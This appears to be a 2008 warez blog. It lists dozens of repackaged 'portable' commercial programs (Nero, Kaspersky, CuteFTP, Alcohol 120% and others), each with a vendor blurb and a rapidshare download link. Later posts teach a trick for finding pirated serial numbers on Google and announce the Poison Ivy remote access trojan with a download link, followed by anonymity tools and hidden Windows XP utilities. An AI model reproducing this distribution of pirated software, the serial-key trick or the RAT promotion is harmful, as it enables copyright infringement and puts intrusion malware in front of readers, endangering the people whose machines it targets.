The Advanced Search feature helps you to find files and folders more easily, by name, size or creation/modification date, whether they are on your local computer or a remote server, and advanced operations after transfer can be set to automatically exit and shut down your computer, run a virus scan or any number of other tasks upon completing a transfer. Colour-coded tabs make managing multiple transfers to multiple sites easier, and improved Mode Z compression speeds the transfer of ASP, BMP, CSS, DAT, DOC, EXE, HTM, JS, LOG, PDF, PHP, PL, PPT, PY, SWF, TXT, VBS, XLS, XML and XSL files.

We also really liked the Task Automation Wizards which help to ease configuration of scheduling file transfers, hot drop (folder monitoring), backing up remote servers, mirroring local and remote systems and adding new servers to the Site Manager. There's now UTF-8 support for the ISO 10646 character standard, and usability improvements have been added to Bookmarks, Log Files, Macros, Time Zone Synchronization, and Quick Connect.

CuteFTP Professional provides easy-to-use yet powerful tools for tackling the complex challenges of data management and helps achieve HIPAA, GLBA and Sarbanes-Oxley compliance. If you're looking to share large files and business data with confidence, CuteFTP Professional is a decent choice. However, in our tests we noticed that the software used system resources (up to 20% CPU) - even while idle - and almost double that while transferring large numbers of smaller files.

CODE:
http://rapidshare.com/files/52581952/Cute__FTP_Pro_8.0_Portable_by_mansur.rar

GetDataBack 3.03 For Fat:

GetDataBack 3.03 For NTFS & FAT

- Hard drives (IDE, SCSI, SATA)
- USB drives
- Firewire drives
- Partitions
- Dynamic Disks
- Floppy drives
- Drive images
- Zip/Jaz drive
- Compact Flash Cards
- Smart Media Cards
- Secure Digital Cards
- USB Flash Drive
- iPod Disks




CODE:
http://rapidshare.com/files/52582079/GetDataBack_3.03_For_Fat_by_mansur.rar


Port Proxy SwitcherPro 3.7.3647 Portable:


Port Proxy Switcher Pro:

Proxy Switcher - change proxy settings on the fly. Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher offers a full featured connection management solution. This includes flexible proxy server list management, a proxy server tester and anonymous surfing capabilities.

Proxy Switcher Features:
- Change proxy settings on the fly
- Automatic proxy server switching for anonymous surfing
- Works with Internet Explorer, Firefox, Opera and others.
- Flexible proxy list management
- Proxy server availability testing
- Anonymous proxy server list download


CODE:
http://rapidshare.com/files/52584438/Port_Proxy_SwitcherPro_3.7.3647_Portable_by_mansur_.rar


Yahoo Messenger 7.5 Portable:

Yahoo Messenger is a free service that allows you to see when friends come online and send them instant messages. It can also alert you to new e-mail in your Yahoo Mail or Yahoo Personals account, or when you have upcoming events recorded in Yahoo Calendar.



CODE:
http://rapidshare.com/files/52586899/Yahoo_Messenger_7.5_Portable_by_mansur.rar

Audio Edit Magic 9.21 Portable:


Audio Edit Magic is a visual audio editor and recorder software solution, which supports many advanced and powerful operations with audio data.

With Audio Edit Magic you can:
- Open, create, and save audio files in any of the supported formats (can also save any portion of a loaded file to disk as a new file);
- Display audio data waveform (Zoom Full, Zoom In, Zoom Out, Zoom Vertical);
- Play audio files or any portion of the files (Play, Pause, Stop);
- Record audio data from a microphone or any other available input device;
- Edit audio files visually (Cut, Copy, Delete Selection, Delete Silence, Paste, Paste From File, Mix, Mix From File);
- Apply various effects (Amplify, Compressor, Delay, Equalize, Fade In and Fade Out, Flanger, Invert, Normalize, Phaser, Reverb, Reverse, Silence, Shrink, Stretch, Vibrato, etc.);
- Apply different filters to any selected portion of audio files;
- Work with all major audio file formats such as uncompressed WAV; compressed WAV; MP3, MP2; Ogg; WMA; CDA (Audio CD Tracks); AVI; AIFF; AU; G.721, G.723, G.726; VOX; RAW;
- And much more!


CODE:
http://rapidshare.com/files/52587380/Audio_Edit_Magic_9.21_Portable_by_mansur.rar

AVG Anti Virus 7.5 Portable:


AVG Anti-Virus has been protecting computers around the world for more than 12 years!
AVG for workstations provides comprehensive antivirus protection for personal computers. The unique combination of detection methods (heuristic analysis, generic detection, scanning and integrity checking) ensures that your computer receives the maximum protection possible on multiple levels (Resident Shield, Email Scanner plug-ins, Personal Email Scanner, On-Demand and other tests, etc.). It is available as AVG Professional Single Edition for single workstation protection and AVG SoHo Edition (Small office - Home office) for home or small offices.


CODE:
http://rapidshare.com/files/52588507/AVG_Anti_Virus_7.5_Portable_by_mansur.rar

Babylon Pro Portable:



Babylon-Pro is the world's leading dictionary and language translation software. Babylon offers you the most intuitive tool for all your translation, information and conversion needs. Just click on any word, phrase or number and a small window instantly appears with the desired results from Babylon's extensive database of language dictionaries, glossaries and conversion tools.

Highlights:

Single Click activation
Just click on any word, phrase or number to get the results that you need.

Babylon Language Dictionaries
Babylon gives you access to 25 professional dictionaries in 13 languages: English, French, German, Spanish, Italian, Portuguese, Japanese, Hebrew, Chinese (Traditional), Chinese (Simplified), Dutch, Russian and Swedish. In addition, Babylon has a database of over 1,200 free glossaries in over 50 languages.

Wikipedia Content
Babylon's single click intuitive technology offers users results from Wikipedia, the multilingual web-based encyclopedia, in 9 languages with more than 2,000,000 articles.

Writing Aid Tools
In addition to translation and dictionary results, Babylon also offers its users tools for finding just the word that they need and ensures correct conjugation. As some words can be translated in more than one way, Babylon enables users to see each possible translation with its equivalent translation in the user's native language, ensuring that you use the most appropriate word available. Babylon also shows you all possible conjugations to guarantee that you use the correct word in the correct form.

Unit Conversions
Babylon converts currencies, measurements and time, just click on any value in Windows applications to get instant conversions. Babylon automatically identifies the required conversion, based on unit symbols that appear next to the numbers, and will perform the conversion.

'Say-It' add-on feature
Babylon's 'Say-It' feature enables you to hear the correct pronunciation of words, in either a male or female voice.

System Requirements
- U3 smart drive
- Microsoft Windows 2000 / Windows XP


CODE:
http://rapidshare.com/files/52588647/Babylon_Pro_Portable_by_mansur.rar


CloneDVD2 2.8.9.5 Portable:



CloneDVD 2 copies movies in unparalleled picture quality. Whether it's only the main movie or a complete DVD - CloneDVD compresses even long footage in brilliant quality and at high speed: A special transcoding technology compresses your choice of DVD titles according to your audio and language selection automatically to a freely adjustable target size.


CODE:
http://rapidshare.com/files/52588778/CloneDVD2_2.8.9.5_Portable_by_mansur.rar

dBpowerAmp 11.5 Portable:



Often called the Swiss army knife of audio, dMC can digitally rip sound from audio CDs to a multitude of formats. Convert from one format to another while preserving ID tags. Nearly every audio type is supported, including MP3, MP4, Windows Media Audio (WMA), OGG Vorbis, AAC, Monkey's Audio, and FLAC (with optional installs from Codec Central).


CODE:
http://rapidshare.com/files/52589025/dBpowerAmp_11.5_Portable_by_mansur.rar

Everest Ultimate 2006:


EVEREST Ultimate Edition is an industry leading system diagnostics and benchmarking solution for enthusiast PC users, based on the award-winning EVEREST Technology. During system optimization and tweaking it provides essential system and overclock information, advanced hardware monitoring and diagnostics capabilities to check the effects of the applied settings. CPU, FPU and memory benchmarks are available to measure the actual system performance and compare it to previous states or other systems. Furthermore, complete software, operating system and security information makes EVEREST Ultimate Edition a comprehensive system diagnostics tool that offers a total of 100 pages of information about your PC.




CODE:
http://rapidshare.com/files/52589435/Everest_Ultimate_2006by_mansur.rar

FireFox2.0 Portable:

Mozilla Firefox comes with all the latest conveniences and tools. Favorites, plug-ins, and Internet Explorer settings are automatically copied to Mozilla Firefox so that you can set to work immediately.


CODE:
http://rapidshare.com/files/52589708/FireFox_2.0_Portable_by_mansur.rar

Internet Explorer 7 Portable:

Internet Explorer 7 has been designed to make everyday tasks easier, provide dynamic security protection and improve the development platform and manageability. End user improvements include a streamlined interface, tabbed browsing, printing advances, improved search functionality, instant feeds (RSS), dynamic security protection, and more.



CODE:
http://rapidshare.com/files/52590300/Internet_Explorer_7_Portable_by_mansur.rar


IrfanView 3.99 Portable:

IrfanView is a fast and simple image viewer and editor that supports all major graphic formats, including BMP, DIB, JPEG, GIF, animated GIF, PNG, PCX, multipage TIFF, TGA, and more.
It's one of the best image viewers available.



IrfanView features:
- Many supported file formats
- Multi language support
- Thumbnail/preview option
- Slideshow (save slideshow as EXE/SCR or burn it to CD)
- Show EXIF/IPTC/Comment text in Slideshow/Fullscreen etc.
- Support for Adobe Photoshop Filters
- Fast directory view (moving through directory)
- Batch conversion (with image processing)
- Multipage TIF editing
- Email option
- Multimedia player
- Print option
- Change color depth
- Scan (batch scan) support
- Cut/crop
- IPTC editing
- Effects (Sharpen, Blur, Adobe 8BF, Filter Factory, Filters Unlimited, etc.)
- Capturing
- Extract icons from EXE/DLL/ICLs
- Lossless JPG rotation
- Many hotkeys
- Many command line options
- Many PlugIns
- Only one EXE-File, no DLLs, no Shareware messages like "I Agree" or "Evaluation expired"
- No registry changes without user action/permission!
- and many more



CODE:
http://rapidshare.com/files/52590652/IrfanView_3.99_Portable_by_mansur.rar

Kaspersky AntiVirus 6.0.1.41 Portable:

Kaspersky Anti-Virus Personal delivers the user-friendly security your computer needs. PCs connected to the Internet are constantly at risk of attack by viruses, Trojans, Internet worms and other malware. Anti-Virus Personal monitors all virus and spyware entry points leaving you with a clean and safe machine.
- Round-the-clock technical support
- Easy to install and use

Features:

Installs easily with a clear interface and automated functions making it the right choice for even the most inexperienced computer users.
Scans email traffic (POP3, IMAP and NNTP for incoming mail, SMTP for outgoing) for all mail programs.
Scans all HTTP Internet traffic in real time, and offers rapid scan of all individual files, catalogs and disks.
Controls changes to file system to prevent malicious programs from undermining applications.
Monitors program activity and warns of suspicious or hidden processes (rootkits) or unauthorized changes.
Controls status of system registry and alerts of suspicious objects or attempts to create hidden registry keys.
Records all registry and file system changes to rapidly restore your computer after any malicious attacks.
Automatically balances scan speeds with increased user activity; and offers accelerated scan settings.
Blocks dangerous macro commands from being executed.
Delivers the smallest updates (~ 50 Kb) for virtually instant updating.
Supports WiFi Internet access for antivirus updating.
Conserves batteries with economy mode.
Supports Intel Centrino processors and Hyper-Threading technology.


CODE:
http://rapidshare.com/files/52591319/Kaspersky_AntiVirus_6.0.1.41_Portable_by_mansur.rar


Msn 7.5 Portable:


Chat online, in real time, with friends, family, and colleagues. It's faster than e-mail, more discreet than a phone call, and best of all - it's free! MSN Messenger is more than just text, it's a great way to collaborate with co-workers or touch base with family and friends. You can even send an instant message to a contact's mobile phone. Customization features help you personalize your chats and make your connections even more meaningful.

CODE:
http://rapidshare.com/files/52591648/Msn_7.5_Portable_by_mansur.rar

Multi Password Recovery 0.2.6 Portable:


Multi Password Recovery (MPR) is a multifunctional password decryption and auditing solution for Win95/98/W2K/XP/2K3. MPR instantly finds and recovers passwords from more than 60 popular applications (FTP, E-mail clients, IM, Browsers and so on). It also shows passwords hidden under asterisks, copies the SAM file, and can generate new passwords. Under W2K/XP/2K3 MPR is able to process files that are locked for reading.




CODE:
http://rapidshare.com/files/52591691/Multi_Password_Recovery_0.2.6_Portable_by_mansur.rar


Nero 7.2.0.3 Portable:

Along with Nero's award-winning CD and DVD burning capabilities in Nero 7 Premium Reloaded, you can now enjoy the benefits of Blu-ray and HD DVD disc data recording technology, which are fast becoming the industry standard in high density digital media compression and recording. Convert your files to your preferred format and store up to 58 normal-sized CDs on one high density disc with any of Nero's five burning and back-up applications.


CODE:
http://rapidshare.com/files/52592277/Nero_7.2.0.3b_Portable_by_mansur.rar


Norton Portable:

This includes:
1. Norton Express Cleanup
2. Norton WinDoctor
3. Norton Ghost
4. Norton Ghost Explorer
5. Norton Ghost Support Tools
6. Norton PQ Boot
7. Norton Partition Table Editor
8. Norton Partition Info



CODE:
http://rapidshare.com/files/52592868/Norton_Portable_by_mansur.rar


Paragon Drive BackUp:

Drive Backup creates a backup image of the entire hard disk, including an operating system backup with all user preferences and settings, applications and data files. Paragon's Hot Backup Technology lets you create hard drive images in real time without rebooting Windows or interrupting any application. You will be able to completely restore the operating system with all installed and configured applications, valuable documents and files, with no reinstallation required. You can also restore separate files from the hard disk's backup image.

The up-to-date hard disk backup image created with Paragon Drive Backup is the best insurance you may have in any disaster case.


CODE:
http://rapidshare.com/files/52592949/Paragon_Drive_BackUp_6.01.041_Portable_by_mansur.rar


Partition Manager 8.0 Pro(2005) Portable:


7tools Partition Manager 2005 - hard disk storage maintenance. It covers all the operations you may need at home to perform regular maintenance on your own. Partition new hard disks from scratch or upgrade old ones. Prepare hard disks for any operating system and even install several systems. Reconfigure partitions, repartition hard disks on the fly, and improve storage performance. Use the bootable recovery CD to access all the information on an unbootable system.
7tools Partition Manager 2005 offers an extended range of functions to make your data management easier. With its help you can:

- easily deploy a new hard drive and copy your data and partitions
- install and use multiple operating systems, share files between them
- organize better data storage for multi-user computers
- recover your computer after a system crash and secure important data by moving them to a separate partition


... and perform all other kinds of partitioning and repartitioning operations on your disk

Several major components are included with this outstanding product:

* Partition Manager
* Bootmanager
* Recovery CD with DOS and Linux versions of Partition Manager
* DOS drivers on Recovery CD to access NTFS and Ext2fs Partitions
* Linux driver on Recovery CD to access NTFS Partitions
* Built-in ISO-Burner (use it to create your own recovery CD )


CODE:
http://rapidshare.com/files/52593674/Partition_Manager_8.0_Pro_Portable_by_mansur.rar


Port APMS 6.0.4:

CODE:
http://rapidshare.com/files/52594570/Port_APMS_6.0.4_by_mansur.rar
File-Size: 18.76 MB

Super Internet TV 6.8.0.0 Portable:




QUOTE:
Super Internet TV allows you to watch 1000+ live television channels and listen to 1300+ online radio stations from 100+ countries. There is no need for a TV Tuner card because all the channels are streamed through your Internet connection. For most TV and Radio channels a modem speed of 56Kb/s is required, for the broadband TV stations you need 300 Kb/s. This software comes with automatic TV station updates so it will never be out of date. If you are interested in learning languages or alternative programming, this is a good choice for you!

Features:
- More than 1000 FREE TV stations. (see TV channel list)
- More than 1300 FREE radio stations. (see radio channel list)
- More than 200 live webcams. (see webcam list)
- NO TV tuner card required!
- Automatic channel list updates.
- Supports high bandwidth stations.
- Supports thousands of skins (visual styles *.msstyles)
- Resizable screen, including full-screen mode
- Very easy interface

Requirements: RealPlayer and Windows Media Player required. Super Internet TV uses Windows Media Player's decoding system to present the television and radio signals. If you want to watch more channels which use RealVideo format, you also need RealPlayer installed.



CODE:
http://rapidshare.com/files/52594629/Super_Internet_TV_6.8.0.0_Portable_by_mansur_.rar



TMPGEnc MPEG Editor 1.0.1.59 Portable:

TMPGEnc MPEG Editor is a greatly improved version of MPEG Tool (included in TMPGEnc Plus 2.5). It has been reworked into full-featured software offering fast, precise and easy cut-editing. This is possible thanks to the Technical Wizard interface and the Smart Rendering function. Since it is compatible with DVD-VR (VRO), you can load DVD-videos you have made in the past, edit them and convert them to MPEGs.
This software is recommended for people who need to quickly cut-edit MPEGs at frame level!



CODE:
http://rapidshare.com/files/52594847/TMPGEnc_MPEG_Editor_1.0.1.59_Portable_by_mansur.rar



UltraISO Premium Edition 8.6.0 Build 1936 Portable:

With large-capacity hard disks now commonplace, people are used to copying compact discs to CD/DVD image files. The format generally used is the ISO 9660 international standard, which is why CD/DVD image files are called ISO files. Because an ISO file retains the complete data of the compact disc (including the disc's boot information), you can use common CD/DVD burning software (for example Nero Burning ROM) to record it to CD-R/RW or DVD-R/RW as often as you like, and it can also be used directly through virtual CD/DVD-ROM drive software (for example Daemon Tools).

UltraISO is an ISO CD/DVD image file creating/editing/converting tool and a bootable CD/DVD maker , it can directly edit the CD/DVD image file and extract files and folders from it, as well as directly make ISO files from your CD/DVD-ROM or hard disk. At the same time, you can maintain the ISO bootable information, thus creating your own bootable CD/DVDs. You now have the power to make and edit your own ISO files, and then burn them to CD/DVD for your own needs.

UltraISO has its own intelligent ISO document format analyzer; it can currently process almost all types of image files, including ISO and BIN, and it may even support new image file types that are yet to be created. UltraISO can open these image files, directly extract files and folders, edit them, and convert other image files to the standard ISO format.

UltraISO uses a unified dual-window user interface; you can work with only the quick buttons and/or mouse drag and drop, and handle any CD/DVD image file easily.





CODE:
http://rapidshare.com/files/52594890/UltraISO_Premium_Edition_8.6.0_Build_1936_Portable_by_mansur.rar



UninstallTool 1.6.6:

An ultra small and fast utility that helps you to uninstall various software. It can be used instead of the standard, inconvenient and heavy "Add and Remove Programs" applet. The program has lots of features and options missing in Microsoft's applet.



Features:
* Great speed and small size, great quality
* Multilingual, cool and simple interface
* Allows you to display hidden installed programs
* Allows you to quickly find the desired program by typing the letters you know
* Lets you delete programs if their uninstaller fails
* Navigate to the selected program's registry entry, installation folder and its web site
* Saving (exporting to HTML) the current installed software list
* Running the "Windows Components" applet
* ... and a lot more

Currently supported languages: Belarusian, Brazilian, Bulgarian, Chinese, Dutch, English, French, German, Italian, Japanese, Korean, Polish, Russian, Slovak, Spanish, Ukrainian

Uninstall Tool changelog version 1.6.5:

  • Added crash report feature
  • Added FAQ to the help file
  • added some languages
  • serious fix: data in registry stayed when program has been removed
  • some programs were not displayed - fixed
  • minor fixes


CODE:
http://rapidshare.com/files/52594917/UninstallTool_1.6.6_by_mansur.rar


VideoLan 0.8.5r.2Portable:


and DivX files, DVDs, digital satellite channels, digital terrestrial television channels and live videos on a high-bandwidth IPv4 or IPv6 network in unicast or multicast under many OSes. VideoLAN also features a cross-platform multimedia player, VLC media player, which can be used to read the stream from the network or display video read locally on the computer under all GNU/Linux flavours, all BSD flavours, Windows, Mac OS X, BeOS, Solaris, QNX, Familiar Linux.





CODE:
http://rapidshare.com/files/52595316/VideoLan_0._8.5r.2_Portable_by_mansur.rar



WinAvi Video Converter7.7 Portable:

Have you ever been limited to the videotape format? Especially when you really wanted to share films with your family and friends.
WinAVI Video Converter can help you solve your problems!
It is a software program for converting video formats at fast speeds and high quality.

WinAVI Video Converter supports almost all formats of video including :
AVI, MPEG1/2/4, VCD/SVCD/DVD,
DivX, XVid, ASF, WMV, RM,
QuickTime MOV, and Flash SWF.

Features:

WinAVI Video Converter is software for video conversion. By using our product, users are released from the limitations and difficulties of video formats. It can support almost all formats of video including AVI, MPEG1/2/4, VCD/SVCD/DVD, DivX, XVid, ASF, WMV, RM, QuickTime MOV, Flash SWF. Also, it allows you to burn to VCD/SVCD/DVD. A powerful AV compress engine can complete a whole AVI movie conversion and burn it to DVD just in 1 hour. You can enjoy the film with your home & PC DVD Player.

* AVI to DVD
* AVI to MPEG
* AVI to VCD
* AVI to MPG
* Flash SWF conversion
* It can convert all formats to MPEG1/2, VCD, SVCD, and DVD and burn to VCD, SVCD, or DVD disc.
* It can convert all video formats to AVI/WMV/RM/ASF/Divx/Xvid
* QuickTime MOV conversion.
* Real DVD Navigator encoder included.
* DirectAC3 technology supports AC3 5.1, which is state of the art technology. It is up to 20% faster with AVI files including AC3 audio.
* Real Dolby AC3 audio encoder included.
* Burning VCD/SVCD/DVD.
* Stunning video and audio quality.
* User-friendly interface that is easy to use.
* Has the option to preview the video in real-time.
* Has the option to automatically shutdown your computer when the conversion has been completed.




CODE:
http://rapidshare.com/files/52595478/WinAvi_Video_Converter_7.7_Portable_by_mansur.rar


7zip 4.42 Portable:


7-Zip is an open source file archiver with a high compression ratio, predominantly for the Microsoft Windows operating system. It operates either as a command line program or with a graphical user interface. It also features integration with the Windows shell environment. 7-Zip is free software, developed by Igor Pavlov and distributed under the GNU LGPL license.



- High compression ratio in new 7z format with LZMA compression
- 7-Zip is free software distributed under the GNU LGPL
- Supported formats:
Packing / unpacking: 7z, ZIP, GZIP, BZIP2 and TAR
Unpacking only: RAR, CAB, ISO, ARJ, LZH, CHM, Z, CPIO, RPM, DEB and NSIS
- For ZIP and GZIP formats 7-Zip provides compression ratio that is 2-10 % better than ratio provided by PKZip and WinZip
- Self-extracting capability for 7z format
- Integration with Windows Shell
- Powerful File Manager
- Powerful command line version
- Plugin for FAR Manager
- Localizations for 65 languages

CODE:
http://rapidshare.com/files/52595546/7zip_4.42_Portable_by_mansur.rar
File-Size: 1.07 MB


Alcohol 120% 1.9.5.3823 Portable:


Alcohol 120% is CD/DVD emulation and recording software that allows users to copy discs. Store your most used or important CDs as images on your computer and run them at 200x speed from up to 31 virtual CD or DVD drives. Alcohol is compatible with more than 99% of drives available. It supports the latest image file types including MDS, CCD, BIN, CUE, ISO, CDI, BWT, BWI, BWS, BWA and many more.


*** Alcohol 120% enables you to make a duplicate back-up to recordable media of nearly all your expensive Game/Software/DVD titles, and/or an image that can be mounted and run from any one of Alcohol's virtual drives.
*** No other software available enables you to create up to a staggering 31 virtual drives, allowing you to run your game images at over 200x faster than from a conventional CD-ROM. Alcohol 120% is a powerful utility that uses a unique combination of options to ensure a perfect back-up every time.
*** All you need is a PC combined with a CD or a DVD burner. No more replacing your expensive original discs due to loss, theft, scratches, or other media imperfections. Your duplicate works just like the original; your entire collection can be archived and your investment protected.
*** In the home: Have you had experiences with the common conditions of CDs/DVDs? They can easily get scratched, damaged, broken, lost or even stolen. Alcohol provides you with peace of mind and protects your investment.
*** Your original games/program discs can be safely stored away. Alcohol-created images mean that you always have your expensive media stored safely on your hard drive for instant retrieval at the click of a button. No more searching for the correct game disc or software application install disc, everything is at your fingertips.
*** You can now, for instance, simultaneously play your favourite game and bring up your route planner without having to eject and reload any physical discs. The 31 virtual drive ability of Alcohol means you can have the equivalent of a staggering 31 CD-ROM drives in your Home PC, all instantly accessible. You can simply and quickly run your Disc image at around 200 times faster than that of a conventional CD-ROM drive. If you need a program or CD it is immediately there - always ready to use!
*** At the office: Program discs and many other applications generally require the original disc to be in the computer's CD-ROM drive. This restricts the amount of people in your office who can have access to the same software at the same time without the cost of additional discs. Alcohol's virtual drives resolve that problem for you. No more hunting around the offices for that elusive disc you need to run your application, everything you require is just a click away.
*** With Alcohol you can store your CD images on your office server, your colleagues and employees at their respective networked workstations will never need to come asking for a CD again, they will not even require an expensive CD-ROM drive installed in their workstation PC! A simple click is all that is required for them to have full access to any disc image they require for their day to day work. Your valuable CDs can be safely kept under lock and key.
*** Does your company have a promotional CD for its customers? Original pressed discs are expensive; using the Alcohol 120% writing engine you can copy the original to inexpensive blank discs for distribution to your customers and keep your overheads down.
*** Alcohol software offers unrivalled usage to people from all walks of life regardless of if you are a hardened game player, busy school teacher, salesman, IT manager, student etc. Alcohol has a niche in all your everyday computer needs. Let Alcohol help you to help yourselves and give you the peace of mind you deserve when it comes to expensive PC media.
CODE:
http://rapidshare.com/files/52595622/Alcohol_120__1.9.5.3823_Portable_by_mansur.rar



WinRAR 3.61 Portable:


# Using WinRAR puts you ahead of the crowd when it comes to compression by consistently making smaller archives than the competition, saving disk space and transmission costs.
# WinRAR provides complete support for RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives.
# WinRAR offers a graphic interactive interface utilizing mouse and menus as well as the command line interface.
# When you purchase WinRAR license you are buying a license to the complete technology, no need to purchase add-ons to create self-extracting files, it's all included. One price, one payment, once.
# You also receive the benefit of a life-time use of the WinRAR archiver. No upgrade fee to pay. When a new release is made, simply download and install, your license is valid for life.
# WinRAR is easier to use than many other archivers with the inclusion of a special "Wizard" mode which allows instant access to the basic archiving functions through a simple question and answer procedure. This avoids confusion in the early stages of use.
# WinRAR offers you the benefit of industry strength archive encryption using AES (Advanced Encryption Standard) with a key of 128 bits.
# WinRAR supports files and archives up to 8,589 billion gigabytes in size. The number of archived files is, for all practical purposes, unlimited.
# WinRAR offers the ability to create selfextracting and multivolume archives.
# Recovery record and recovery volumes allow you to reconstruct even physically damaged archives.
# WinRAR features are constantly being developed to keep WinRAR ahead of the pack.



CODE:
http://rapidshare.com/files/52595694/WinRAR_3.61_Portable_by_mansur.rar



WhereIsIt 3.75 Portable:

Where Is It? is an application written for 32-bit Windows operating systems, designed to help you maintain and organize a catalog of your computer media collection, including CD-ROMs, audio CDs, diskettes, removable drives, hard drives, network drives, DVDs, or any other media that Windows can access as a drive.

The most basic goal for Where Is It? is to provide access to the contents of any media you have from a cataloged database, even if the media itself is not available on the system - you can browse lists of files and folders, search by any criteria, use descriptions, thumbnails, categories, flags, etc.

Where Is It? can handle lots of them, too: a couple of hundred or thousand disks in a catalog is nothing unusual, yet catalogs remain reasonably small, single-file and easy to transfer or send to other users. You can also create more than one catalog, and at any time open and work with as many catalogs at once as needed. WhereIsIt is easy to use for both beginners and advanced users. It features a familiar and well thought-out, Explorer-like user interface, combined with strong searching and reporting capabilities, multi-language support, automated description and thumbnail importing through extendable plugins from more than 70 different sources, and much more.



New in version 3.75:

* Changes in this release concentrate on updating the program's visual appearance and the usability of the user interface. Most of the features are a small glimpse into custom-developed client versions.
* Settings dialog has been reorganized, options are easier to access and browse. Did away with tabs altogether, sections are now available through a more modern, WinXP-style taskbar control. Settings dialog is now also fully resizable and will remember its size and position.
* Standard command buttons in dialogs like "OK" and "Cancel" are visually separated from the rest of dialog's contents throughout the program. This helps reduce dialog clutter a little bit.
* Toolbars and non-themed buttons have (optionally) a more modern, shaded three-dimensional appearance on hi-color enabled displays.
* Most status bars now support themes, a few exceptions were left out on purpose as they fit dialogs better when displayed the old way.
* Several dialogs that were previously fixed in size are now resizable.
* A few other adjustments mostly dealing with user interface.
CODE:
http://rapidshare.com/files/52595866/WhereIsIt_3.75_Portable_by_mansur.rar


Spyware Doctor:


Spyware Doctor is an advanced adware and spyware removal program that will detect and clean thousands of potential spyware, ad ware, keyloggers, trojans, spy ware cookies, trackware, spybots and other malware from your computer.

Spyware Doctor is a multi-award winning spyware removal utility that detects, removes and protects your PC from thousands of potential spyware, adware, trojans, keyloggers, spybots and tracking threats.

Editor's Choice Anti-Spyware

Don't compromise your security with second best!
* Recommended by experts and editors around the world as the best Anti-Spyware.
* FREE award-winning customer support for all users.
* Frequent advanced updates ensure that you are always protected.
* Detects, removes and blocks all types of Spyware and Adware threats.
* Easiest to use with intelligent automatic protection.
* 100% Money Back Guarantee.

Best Spyware Protection. Used by Millions World Wide!

CODE:
http://rapidshare.com/files/52630871/Spyware_Doctor_4.0.0.2618_Portable_by_mansur.rar

Atlantis :


Portable Word is an alternative to MS Office Word: very small, but with the complete feature set of MS Word.

Atlantis Word Processor



Atlantis is an innovative, no-nonsense word processor carefully designed with the end-user in mind. Compact, fast-loading, but still powerful and efficient, Atlantis will be the perfect companion for a wide range of your word processing tasks, from simple to most complex.

It does not matter if you are a novice or a power user, Atlantis has the tools you will ever need to compose highly professional documents. Using a most original and practical Control Board, you will create and manage all components of complex documents with unparalleled ease: sections, fields, headers & footers, newspaper columns, bulleted & numbered lists, styles, bookmarks, footnotes & endnotes, etc, all are a breeze with Atlantis.

Both the Safeguard and Backup Files features make sure that you work under extremely safe conditions. Private documents can also be encoded and secured: you can save them to a proprietary COD file format using powerful 256-bit encryption technology.

The Atlantis AutoCorrect and Spellcheck-As-You-Type features combine with a unique typing assist, the Atlantis Power Type, to dramatically simplify your word processing life.

The Atlantis interface is entirely customizable: menus, toolbars, hot keys, colors and sounds can all be adjusted to suit your own requirements. What's more, Atlantis is a fully portable word processor. You can install Atlantis to a memory flash drive, and Atlantis will travel with you wherever you go.

And much-much more for you to discover...


CODE:
http://rapidshare.com/files/52629668/Atlantis_by_mansur_.rar


Please Write Your suggestions to improve the blog here  

Friday, January 18, 2008

Please Write Your suggestions Here


How To Find Serial Numbers On Google  

Thursday, January 17, 2008

ok, this is a little trick that i usually use to find cd keys with google.


If you're looking for a serial number for Nero (for example), go to google.com and type nero 94FBR and it'll bring it up.

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of an Office 2000 Pro CD key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.

2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.


I hope this trick helps you find your CD keys easily.

Enjoy


Poison Ivy RAT  

Wednesday, January 16, 2008






Poison Ivy 2.3.1 released!




DL:

http://www.poisonivy-rat.com/index.php?link=download


16 tools to stay anonymous  

01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 GhostSurf Platinum 2007
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 MultiProxy v1.2
11 NetConceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxygrab 0.6
14 proxyway extra v3.2
15 SmartProxyHelper 1.5
16 Steganos Internet Anonym 2006 v8.0.1

Download Links :-

http://rapidshare.com/files/48541745/Aio-Ip-Anonymous-Surfing-Tools.exe.001
http://rapidshare.com/files/48541751/Aio-Ip-Anonymous-Surfing-Tools.exe.002


23 hidden app in xp  

To run any of these apps go to Start > Run and type the executable name:

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existent).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File signature verification tool = sigverif.exe

18) Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Microsoft Telnet Client = telnet.exe

